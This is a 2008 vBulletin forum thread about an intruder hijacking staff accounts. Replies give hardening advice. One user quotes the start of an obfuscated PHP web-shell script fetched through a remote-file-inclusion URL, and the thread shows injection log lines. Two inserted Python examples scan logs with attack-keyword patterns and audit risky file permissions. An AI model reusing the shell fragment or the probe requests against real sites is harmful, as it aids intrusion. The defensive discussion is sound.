weird user maybe a hacker


dtv100
06-24-2008, 07:40 PM
This morning around 5am I went to Who's Online and saw someone using one of my test accounts on our board, and where his IP should be it only said "server2". When I clicked Resolve IP I got 127.0.0.1. I deleted the test account; he was trying to log in using different admin names from the forum leaders list. Then I made all admins regular users just to be safe.

This is the first time I've seen someone with an IP like that, because 127.0.0.1 should be localhost. Or am I wrong?

Any idea where I should look first?

Jase2
06-24-2008, 07:44 PM
Re-upload all the default vBulletin files to be on the safe side.

nexialys
06-24-2008, 07:59 PM
That IP is simple to use... someone with a website hosted on the same server as you, using a shelled page... automated login via localhost access... basic, the first thing a newbie hacker would do to trick a forum, coming from phpBB...

cheat-master30
06-24-2008, 09:47 PM
Well, since there aren't any currently known security issues with vBulletin, as long as your passwords are secure and relatively complex and you follow the basic security tips given on the official site, this user shouldn't succeed...

Jase2
06-24-2008, 09:50 PM
Not necessarily. The bad guys always find the exploits first... For all you know, there could be an exploit in the new vBulletin that is just not known yet ;)

cheat-master30
06-24-2008, 11:08 PM
Well, if they were trying something used on phpBB boards, then trying that technique on a vBulletin-powered board, despite vBulletin being coded completely differently other than using PHP and MySQL, would not exactly make me think said 'hacker' was too competent.

That, and I doubt Jelsoft would leave yet another security problem in vBulletin that somehow went undetected for months, despite many great coders having used the software who would probably have reported any security problems they found...

dtv100
06-25-2008, 12:12 AM
That IP is simple to use... someone with a website hosted on the same server as you, using a shelled page... automated login via localhost access... basic, the first thing a newbie hacker would do to trick a forum, coming from phpBB...
Is there any way I could ban that IP, I mean 127.0.0.1, without any side effect on my board?

King Kovifor
06-25-2008, 12:18 AM
Unless other users use that IP, no.

Jase2
06-25-2008, 11:06 AM
Well, if they were trying something used on phpBB boards, then trying that technique on a vBulletin-powered board, despite vBulletin being coded completely differently other than using PHP and MySQL, would not exactly make me think said 'hacker' was too competent.

That, and I doubt Jelsoft would leave yet another security problem in vBulletin that somehow went undetected for months, despite many great coders having used the software who would probably have reported any security problems they found...

I never said there is a security issue. I said there 'could' be ;)

As I've said, exploits are always found by the bad guys first. Not every security issue is that noticeable, even with quality coders using vBulletin.

dtv100
06-25-2008, 07:49 PM
OK, today he finally got hold of my user account, though he can only log in as a user and can't get into the control panel, since we have a second password for it.
He also did the same thing on our second site.

He posted in our staff area that he is using an SQL injection. I am in the process of removing the hacks that are installed on both sites to see if that helps.

The server login was changed, the FTP login was changed, basically all passwords were changed, and I banned IP 127.0.0.1. Now I will re-upload all vB files again.

Anything I'm forgetting?

Jase2
06-25-2008, 08:23 PM
Just disable the plugin/hook system and re-upload all vBulletin non-image files. This will then make your forums use the vBulletin core code.

Dismounted
06-26-2008, 07:08 AM
If the login to the server was changed, it indicates an issue with the server, not vBulletin.

dtv100
06-26-2008, 07:27 AM
If the login to the server was changed, it indicates an issue with the server, not vBulletin.

Sorry, I know my English is bad. What I mean is I made all those changes to prevent him getting hold of the server, or to make sure he doesn't.

I removed these hacks today because they were on both of my sites, so I think one of them may have been the way he found in:

inferno shout box
login as user
arcade
google search tag
who is on chat
hide hack

Trying to be safe and not sorry. The hacker and I have been at war for days; today it seems he gave up or took a day off.


Is there any way I can hide the following tools in the admincp behind a password:
generate email list
email members
forum manager

dtv100
07-01-2008, 10:07 PM
Update:
We changed all server passwords and vBulletin passwords, we changed the location of admincp and removed the links from the forum to admincp (only the site owner and I know the link), we hired a server tech to harden the server, we disabled all hacks and re-uploaded the original vB files, and this guy can still log in and post as anyone on staff.
I change my password every day and he can still post as me too.

Any ideas where else to look?

Dismounted
07-02-2008, 06:45 AM
Are you sure they haven't uploaded any malicious files?

dtv100
07-02-2008, 07:58 AM
Are you sure they haven't uploaded any malicious files?


OK, I will delete everything on the server except for the SQL, avatars, profile pictures, attachments and a few PHP files I wrote myself (extra pages), and will re-upload all vB files,

to make sure that no file we did not upload is there.

ThatSnowGuy
07-16-2008, 04:43 AM
I have a guest on my site who is viewing an error message. This is the guest's location:

/forums/showthread. php?t = http://64.15.67.17/~calebsbi/logo.jpg

I added some spaces, not sure if posting the link is OK here or not, but it is not a link to a .jpg; it is some type of script. I reported abuse to the host of the account, so I am not sure how long the link will work.

Here is how it starts out. I am removing the first character so it will show here. (I hope)

? set_time_limit(0); ini_set("max_execution_time",0); set_magic_quotes_runtime(0); ini_set('output_buffering',0);
error_reporting(0); ignore_user_abort(); function hc8a89c2c306fb($p341be97d9aff9) { $p341be97d9aff9 = str_replace(" ", "", $p341be97d9aff9);
return $p341be97d9aff9; } function ub5d21085bf2c0($p341be97d9aff9) { $p341be97d9aff9 = base64_decode(hc8a89c2c306fb($p341be97d9aff9));
return $p341be97d9aff9; } $oec12e0af93cb5 = array ( "po"

It's a pretty long script.

~Chuck

Marco van Herwaarden
07-16-2008, 09:33 AM
I guess this was a failed attempt to do an XSS attack on your forum.

ThatSnowGuy
07-16-2008, 11:40 AM
Thanks for the reply Marco. I am guessing it may have been a bot as it stayed around for hours, even after I turned off the Forums for an hour.

~Chuck

dtv100
08-10-2008, 07:34 PM
I found this in my logs after the hacker tried again. Maybe someone could tell me if he is trying an injection and how to block it.

2008-08-05, 14:25:57, 1217946357, 64.7.132.147, do=private%20sub%20cmdsubmit_click(), Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
2008-08-05, 14:43:24, 1217947404, 64.7.132.147, do=private%20sub%20cmdsubmit_click(dim%20sql%20as% 20string), Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
2008-08-05, 14:43:59, 1217947439, 64.7.132.147, do=private%20sub%20cmdsubmit_click(dim%20sql%20as% 20string, Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
2008-08-05, 14:47:52, 1217947672, 64.7.132.147, do=private%20sub%20cmdsubmit_click(dim%20sql%1as%2 0string, Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
2008-08-05, 15:01:31, 1217948491, 64.7.132.147, do=private%20sub%20cmdsubmit_click(), Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
2008-08-05, 20:27:26, 1217968046, 64.7.132.147, do=private%20sub%20cmdsubmit_click(dim%20sql%20as% 20string), Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
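
The request lines above, together with the URL-in-parameter request ThatSnowGuy pasted earlier, are exactly the kind of thing worth scanning for automatically rather than by eye. What follows is an added example, not code from this thread or from vBulletin: a small Python scanner over a log in the same comma-separated layout (date, time, epoch, client IP, query string, user agent). It flags three things: a loopback source address like the 127.0.0.1 seen in the first post, a full URL in a parameter that should hold a numeric id (a remote-file-inclusion probe), and code-like payloads in a parameter such as the Visual Basic text in the `do=` lines. The sample log, the 198.51.100.7, 203.0.113.9 and 192.0.2.x addresses, and the keyword lists are all constructed for this example. It also emits `.htaccess` Deny lines of the kind toonysnn suggests below, deliberately leaving loopback out, since `Deny from 127.0.0.1` also blocks the server's own legitimate local requests.

```python
"""Scan a forum request log for injection-style parameters.

Added example, not code from the thread or from vBulletin. The line layout
(date, time, epoch, client IP, query string, user agent) follows the lines the
original poster pasted; the log below is constructed for this example and uses
documentation addresses (RFC 5737) rather than any real host.
"""
import ipaddress
import re
from urllib.parse import parse_qsl

# Constructed sample log; the 'do=' payloads mirror the shape of the ones in the thread.
SAMPLE_LOG = """\
2008-08-05, 14:25:57, 1217946357, 198.51.100.7, do=private%20sub%20cmdsubmit_click(), Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
2008-08-05, 14:43:24, 1217947404, 198.51.100.7, do=private%20sub%20cmdsubmit_click(dim%20sql%20as%20string), Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
2008-08-05, 15:02:10, 1217948530, 203.0.113.9, t=http://192.0.2.10/~user/logo.jpg, Mozilla/5.0 (X11; Linux)
2008-08-05, 15:03:44, 1217948624, 127.0.0.1, do=login, curl/7.18.0
2008-08-05, 15:04:01, 1217948641, 192.0.2.55, t=1234, Mozilla/5.0 (Windows NT 6.0)
"""

# A full URL where the board expects an id is the classic remote-file-inclusion probe.
URL_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)
# Keywords and punctuation that do not belong in a vBulletin 'do=' or 't=' value
# (assumed list; extend it for the payloads you actually see).
CODE_RE = re.compile(
    r"\b(?:sub|dim|select|union|insert|exec|eval|base64_decode)\b|\(\)|;",
    re.IGNORECASE,
)


def parse_line(line):
    """Split one log line into its fields; the user agent may itself contain commas."""
    parts = line.split(", ", 5)
    if len(parts) != 6:
        return None
    date, time_, epoch, ip, query, ua = parts
    return {"date": date, "time": time_, "epoch": epoch, "ip": ip, "query": query, "ua": ua}


def _is_loopback(ip):
    try:
        return ipaddress.ip_address(ip).is_loopback
    except ValueError:
        return False


def classify(record):
    """Return a list of finding tags for one parsed request (empty if it looks benign)."""
    findings = []
    try:
        if ipaddress.ip_address(record["ip"]).is_loopback:
            # A request from 127.0.0.1 did not arrive over the network: it came from
            # something on the same host (a co-tenant's script on shared hosting,
            # or a local cron job), so the fix is on the host, not in the forum.
            findings.append("loopback-source")
    except ValueError:
        findings.append("bad-ip")
    for key, value in parse_qsl(record["query"], keep_blank_values=True):
        if URL_RE.match(value):
            findings.append(f"rfi:{key}")
        if CODE_RE.search(value):
            findings.append(f"code-in-param:{key}")
    return findings


def scan(log_text):
    """Map each client IP with at least one finding to its list of findings."""
    by_ip = {}
    for line in log_text.splitlines():
        record = parse_line(line)
        if record is None:
            continue
        tags = classify(record)
        if tags:
            by_ip.setdefault(record["ip"], []).extend(tags)
    return by_ip


def deny_rules(by_ip):
    """Build Apache 2.2-style .htaccess lines for the flagged remote addresses.

    Loopback and unparseable addresses are skipped: a 'Deny from 127.0.0.1'
    also blocks the server's own legitimate local requests.
    """
    return [
        f"Deny from {ip}"
        for ip, tags in by_ip.items()
        if "bad-ip" not in tags and not _is_loopback(ip)
    ]


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for ip, tags in hits.items():
        print(ip, tags)
    print("\n".join(deny_rules(hits)))
```

Run it against the real log with `scan(open("access.log").read())`. A `code-in-param` hit on its own only shows what was sent, not whether it worked; the proof of an actual injection is in the database and the PHP files, which is why the "did they upload anything?" question later in the thread matters more than the log.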

toonysnn
08-10-2008, 07:39 PM
He's trying but probably is miserably failing.
I suggest you just block the IP in .htaccess

Deny from 64.7.132.147

dtv100
08-10-2008, 07:54 PM
He is still after all my forums. I just opened a new one that was clean, no mods, and when he went there he could still log in as anyone he wanted, but this time he got a surprise: the admincp has an htaccess password and it is long.

That right there lets me know he doesn't have FTP to the server; he just uses SQL injection.
I know vB is solid, but maybe he discovered a way in, not sure.
He also uses an anonymous proxy.

ForgotenDynasty
08-10-2008, 08:12 PM
lol, looks like he's trying to hack you using Visual Basic

I wouldn't worry about him if he's trying to do that :p

toonysnn
08-10-2008, 08:20 PM
lol, looks like he's trying to hack you using Visual Basic

I wouldn't worry about him if he's trying to do that :p
haha good point. :p

PHP is the only thing you should be worried about (as the extension is .php)

PAKIDIL
08-16-2008, 06:26 PM
If you are using the arcade or some hack that requires chmod 777, that is very risky: anyone can deface your website or even get the password to your cPanel. So just check it again.
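
Dismounted's question earlier (whether malicious files were uploaded) and the warning just above about hacks that need chmod 777 are both things you can check with a script instead of by eye. What follows is an added example, not code from this thread or from vBulletin: a Python audit that walks a web root and reports world-writable files and directories, and PHP-family files (including double extensions such as logo.php.jpg) sitting in upload directories. The directory names attachments, customavatars and customprofilepics are assumed from vBulletin's file-system storage layout; the sample tree it builds in a temporary directory is constructed for the example.

```python
"""Audit a web root for world-writable paths and scripts in upload directories.

Added example, not the thread's or vBulletin's code. The upload directory names
are assumptions based on vBulletin's file-system storage layout; the sample tree
is constructed in a temporary directory so the audit runs offline.
"""
import os
import stat
import tempfile

# Directories the board writes user-supplied files into (assumed names).
UPLOAD_DIRS = {"attachments", "customavatars", "customprofilepics"}
# Any of these anywhere in a file name (shell.php, logo.php.jpg) may be executed
# by a permissive Apache AddHandler/AddType configuration on shared hosting.
SCRIPT_EXTS = {"php", "php3", "php4", "php5", "phtml", "phar"}


def looks_like_script(name):
    """True if any dotted suffix of the file name is a PHP-family extension."""
    return bool(SCRIPT_EXTS & set(name.lower().split(".")[1:]))


def audit(root):
    """Return sorted (relative path, reason) pairs for risky entries under root."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        top = os.path.normpath(rel_dir).split(os.sep)[0]
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.normpath(os.path.join(rel_dir, name))
            mode = os.lstat(full).st_mode
            if stat.S_ISLNK(mode):
                continue  # the mode bits of a symlink itself mean nothing
            if mode & stat.S_IWOTH:
                # chmod 777 / 666: any other account on a shared host can modify it.
                findings.append((rel, "world-writable"))
            if top in UPLOAD_DIRS and stat.S_ISREG(mode) and looks_like_script(name):
                # A script in a directory that should only hold images/attachments.
                findings.append((rel, "script-in-upload-dir"))
    return sorted(findings)


def _write(path, mode, content=b""):
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as fh:
        fh.write(content)
    os.chmod(path, mode)


def build_sample_tree(root):
    """Constructed layout mixing sane and risky entries (not a real board)."""
    files = {
        "index.php": (0o644, b"<?php // normal board file\n"),
        "includes/config.php": (0o666, b"<?php // db credentials, world-writable\n"),
        "attachments/2008/photo.jpg": (0o644, b"\xff\xd8"),
        "attachments/2008/shell.php": (0o644, b"<?php // uploaded as an 'attachment'\n"),
        "customavatars/avatar1.php.jpg": (0o644, b"<?php // double extension\n"),
    }
    for rel, (mode, content) in files.items():
        _write(os.path.join(root, rel), mode, content)
    os.makedirs(os.path.join(root, "arcade"), exist_ok=True)
    # Pin directory modes explicitly so the result does not depend on the umask.
    dir_modes = {"includes": 0o755, "attachments": 0o755, "attachments/2008": 0o755,
                 "customavatars": 0o755, "arcade": 0o777}
    for rel, mode in dir_modes.items():
        os.chmod(os.path.join(root, rel), mode)


def run_demo():
    """Build the sample tree in a temp dir, audit it, and return the findings."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return audit(root)


if __name__ == "__main__":
    for path, reason in run_demo():
        print(f"{reason:22} {path}")
```

Point `audit()` at the board's actual document root. A script-in-upload-dir hit is the kind of "file we did not upload" the thread is looking for; a world-writable hit on something like includes/config.php is how a co-tenant on the same host gets the database credentials without ever touching vBulletin.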